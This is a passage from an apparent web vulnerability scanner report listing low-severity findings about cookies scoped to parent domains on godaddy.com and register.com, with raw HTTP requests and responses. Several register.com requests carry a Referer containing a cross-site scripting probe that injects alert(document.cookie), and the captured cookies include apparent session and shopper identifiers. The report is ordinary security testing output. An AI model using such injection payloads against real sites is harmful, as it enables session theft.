planType=standard&domainsIndex=0&targetDivID=smulti_ddl_container&ddlID=smulti_ddl

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:29:25 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:29:25 GMT
Content-Length: 820

{"Html":"\r\n \u003cselect id=\"smulti_ddl\" class=\"t11 plan_ddl\"\u003e\r\n \u003coption value=\u00275710\u0027 \u003e1 Yr: $89.99/yr \u003c/option\u003e\u003coption value=\u00275718\u0027 \u003
...[SNIP]...

10.63. http://www.godaddy.com/ssl/ssl-certificates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/ssl-certificates.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:52 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:52 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215917&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&referringdomain=&split=69; domain=godaddy.com; path=/
BlueLithium_ssl=rezcqjcaqgtalgqbijnijijbnhagqigb; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/ssl-certificates.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&split=24&referringdomain=

Response

10.64. http://www.register.com/css/basic.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/css/basic.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BDC26718D67410D617BB9E98795010A3; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/basic.css HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:10 GMT
Set-Cookie: TLTSID=BDC26718D67410D617BB9E98795010A3; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:11 GMT
ETag: "48e6e-2a0dc-4aba016b636c0"
Accept-Ranges: bytes
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/css
Set-Cookie: TSfd06f3=d2937cbf720198647e74b325b537776034fb6f4d2b0d40564e629da2286023f234aaaa7a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 172252

/* Register - basic.css
/* Register - basic.css
---------------------------------------*/
/*    1. Global Elements/Classes
       a. Browser Reset
       b. Font Definitions
       c. Element Styles
       d. Global Classe
...[SNIP]...

10.65. http://www.register.com/css/titan-screen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/css/titan-screen.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BDC29F30D67410D61BCEC691FA7F6315; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/titan-screen.css HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:10 GMT
Set-Cookie: TLTSID=BDC29F30D67410D61BCEC691FA7F6315; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "48e69-2c2c-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 11308
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/css
Set-Cookie: TSfd06f3=674af69769fa119224d9d19bfb161e4634fb6f4d2b0d40564e629da2286023f2beb4fbf0948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

/*Thickbox - formerly thickbox.css
---------------------------------------*/
   /* **Added by HUGE** */

   .thickbox {
       visibility:hidden;
   }

   /* -----------------------------------------------------
...[SNIP]...

10.66. http://www.register.com/imgs/global/crtIcon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/imgs/global/crtIcon.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imgs/global/crtIcon.gif HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:33 GMT
ETag: "c337a-1ab-4aba01805e840"
Accept-Ranges: bytes
Content-Length: 427
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/gif
Set-Cookie: TSfd06f3=989560f402c52ef6e5467a0378482f6234fb6f4d2b0d40564e629da2286023f235ed6f81948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

GIF89a.........z..............).....:..............[..H.....z..m..N..d..f...........{........................!.......,............'.di....+.m......8.a<.m..g..h...b...d...`.X.XA...`."NF.)..g... n0.n`N.
...[SNIP]...

10.67. http://www.register.com/imgs/global/registerLogo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/imgs/global/registerLogo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BEB0737CD67410D61C12CE72E6515F79; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imgs/global/registerLogo.gif HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEB0737CD67410D61C12CE72E6515F79; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:30 GMT
ETag: "34e516-b9e-4aba017d82180"
Accept-Ranges: bytes
Content-Length: 2974
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/gif
Set-Cookie: TSfd06f3=36a9a6be0fb65991f3e0ada517cd8fc334fb6f4d2b0d40564e629da2286023f2d77d8819948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

GIF89aU.5.........o............b..7.r.............|Y.....?.qK................................................!.......,....U.5.... $.di.h....<...tm.x..|....p.z..@....:...tJ...F..'.
...xL......78d.H.|N.
...[SNIP]...

10.68. http://www.register.com/js/aop-attach.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/aop-attach.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BE9FF4FCD67410D61AE2879D611DB162; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/aop-attach.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE9FF4FCD67410D61AE2879D611DB162; Path=/; Domain=.register.com
HostName: atleuapp03.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:22 GMT
ETag: "1256cd-605-4aba0175e0f80"
Accept-Ranges: bytes
Content-Length: 1541
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=153cfa4d0e155325732f47ed9bffcede34fb6f4d2b0d40564e629da2286023f28cb47c3f948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

function unloadWin(evt){
   // We disable all popups unless the browser is IE
   var disablePopup = true;
   if(!evt) {
       // Yuck - check to see if the mouse cursor is in the general vicinity of where
       /
...[SNIP]...

10.69. http://www.register.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BDF05740D67410D61BCAF1EA8061C90E; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF05740D67410D61BCAF1EA8061C90E; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:16 GMT
ETag: "14b215-beba-4aba017028200"
Accept-Ranges: bytes
Content-Length: 48826
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=980743b8ff4ec39c11121c1d3b73b51a34fb6f4d2b0d40564e629da2286023f23b79d92e948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

root_path = "/";
$(document).ready(function () {
   $.fn.hover = function (C, B) {
       function A(E) {
           var D = E.relatedTarget;
           while (D && D != this) {
               try {
                   D = D.parentNode;
               }
               ca
...[SNIP]...

10.70. http://www.register.com/js/jquery-1.3.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BDEEFB98D67410D61AB284001024AF96; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-1.3.2.min.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDEEFB98D67410D61AB284001024AF96; Path=/; Domain=.register.com
HostName: atleuapp03.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:18 GMT
ETag: "14b223-dfa6-4aba017210680"
Accept-Ranges: bytes
Content-Length: 57254
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=e8f3561ae36189d24acc768ec35fb74a34fb6f4d2b0d40564e629da2286023f278b2737d948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

10.71. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery-ui-1.7.1.custom.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BDF9F0ACD67410D61D11B0753FBACCA0; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-ui-1.7.1.custom.min.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF9F0ACD67410D61D11B0753FBACCA0; Path=/; Domain=.register.com
HostName: atleuapp01.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:15 GMT
ETag: "1dfa9e-b6ad-4aba016f33fc0"
Accept-Ranges: bytes
Content-Length: 46765
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=301b647cf522da421558aacb50cc2aa234fb6f4d2b0d40564e629da2286023f26c256ffa948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/*
* jQuery UI 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.
...[SNIP]...

10.72. http://www.register.com/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery.cookie.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BDF5A8C6D67410D617CC97B16A7B361F; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery.cookie.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

10.73. http://www.register.com/js/jquery.jcarousellite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery.jcarousellite.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BDEF2F14D67410D61AB7CB3A6F264AD2; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery.jcarousellite.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDEF2F14D67410D61AB7CB3A6F264AD2; Path=/; Domain=.register.com
HostName: atleuapp01.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:13 GMT
ETag: "14b226-8c3-4aba016d4bb40"
Accept-Ranges: bytes
Content-Length: 2243
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=6cb398fe6f3b95e43e8ce0909fb5138934fb6f4d2b0d40564e629da2286023f26b0cd9e2948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

(function(D){D.fn.jCarouselLite=function(E){E=D.extend({btnPrev:null,btnNext:null,btnGo:null,mouseWheel:false,auto:null,speed:200,easing:null,vertical:false,circular:true,visible:3,start:0,scroll:1,be
...[SNIP]...

10.74. http://www.register.com/js/mbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/mbox.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BE921B52D67410D610B7F5DDB44FC95E; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mbox.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE921B52D67410D610B7F5DDB44FC95E; Path=/; Domain=.register.com
HostName: atleuapp04.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "14b217-5f99-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 24473
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=c71c7a115bf6f15bfb96be371425b9f134fb6f4d2b0d40564e629da2286023f2951be06a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

var mboxCopyright = "Copyright 1996-2009. Adobe Systems Incorporated. All rights reserved";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return
...[SNIP]...

10.75. http://www.register.com/js/nicejforms.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/nicejforms.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BEB668E0D67410D61C0F8B256BAF5161; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/nicejforms.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEB668E0D67410D61C0F8B256BAF5161; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "1dfaa1-1e84-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 7812
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=f6bf8e381ccc97699cb09ef86948cfb734fb6f4d2b0d40564e629da2286023f20921a71a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

jQuery.NiceJForms={options:{selectRightSideWidth:27,selectLeftSideWidth:1,selectAreaHeight:21,selectAreaOptionsOverlap:2,imagesPath:(typeof (root_path)!="undefined"?root_path:"/")+"imgs/formElements/"
...[SNIP]...

10.76. http://www.register.com/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/s_code.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BEBC2690D67410D6183AD437200921A1; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/s_code.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEBC2690D67410D6183AD437200921A1; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:10 GMT
ETag: "1256cc-7ff7-4aba016a6f480"
Accept-Ranges: bytes
Content-Length: 32759
